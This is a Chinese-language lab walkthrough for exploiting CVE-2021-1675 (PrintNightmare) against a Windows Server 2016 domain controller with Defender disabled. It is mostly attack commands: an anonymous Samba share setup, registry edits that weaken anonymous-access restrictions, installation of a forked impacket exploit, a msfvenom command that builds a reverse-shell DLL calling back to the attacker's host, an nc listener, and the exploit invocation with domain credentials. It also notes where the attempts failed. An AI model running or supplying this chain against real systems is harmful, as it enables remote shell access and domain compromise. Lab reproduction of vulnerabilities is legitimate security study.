一、环境配置
Windows Server 2016域环境(关闭Windows Defender)
ip1:192.168.110.184
ip2:192.168.13.135
kali(开启samba匿名服务)
ip1:192.168.110.129
一个域用户
二、搭建samba并开启匿名共享
ps:公网中是不能搭建samba,似乎是运营商因为永恒之蓝封掉了445端口
linux下(kali自带):
apt-get install samba samba-common
vim /etc/samba/smb.conf
然后更改配置文件,内容如下:
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /usr/share2
guest ok = yes
read only = no
browsable = yes
重启samba
service smbd restart
ps:path路径为共享文件夹路径
Windows下(本人未成功):
mkdir C:\share
icacls C:\share\ /T /grant "ANONYMOUS LOGON":r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'(powershell下运行不适合win7)
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
三、在kali中安装作者的impacket包
exp地址:https://github.com/cube0x0/CVE-2021-1675
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
四、关闭Windows Server 2016 windows Defender
传送门:https://blog.csdn.net/weixin_43140049/article/details/106080625
五、在kali中生成恶意的dll并放入共享文件夹内
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.110.129 LPORT=4444 -f dll -o /usr/share2/shell.dll
六、在kali中建立监听
注意:这里不要用handler监听,要用nc监听(具体原因不详)
nc -lnvp 4444
七、执行exp
python3 CVE-2021-1675.py test.com/testadmin:qazWSX123@192.168.110.184 '\\192.168.110.129\smb\shell.dll'
八、说明
1、在windows中使用如上方式开启匿名共享,但是exp执行失败。
2、由于VPS无法开启445端口,故而在linux机器开启其他端口转发到内网的445端口,同样exp执行失败。
3、该Exp在windows server 2012中执行失败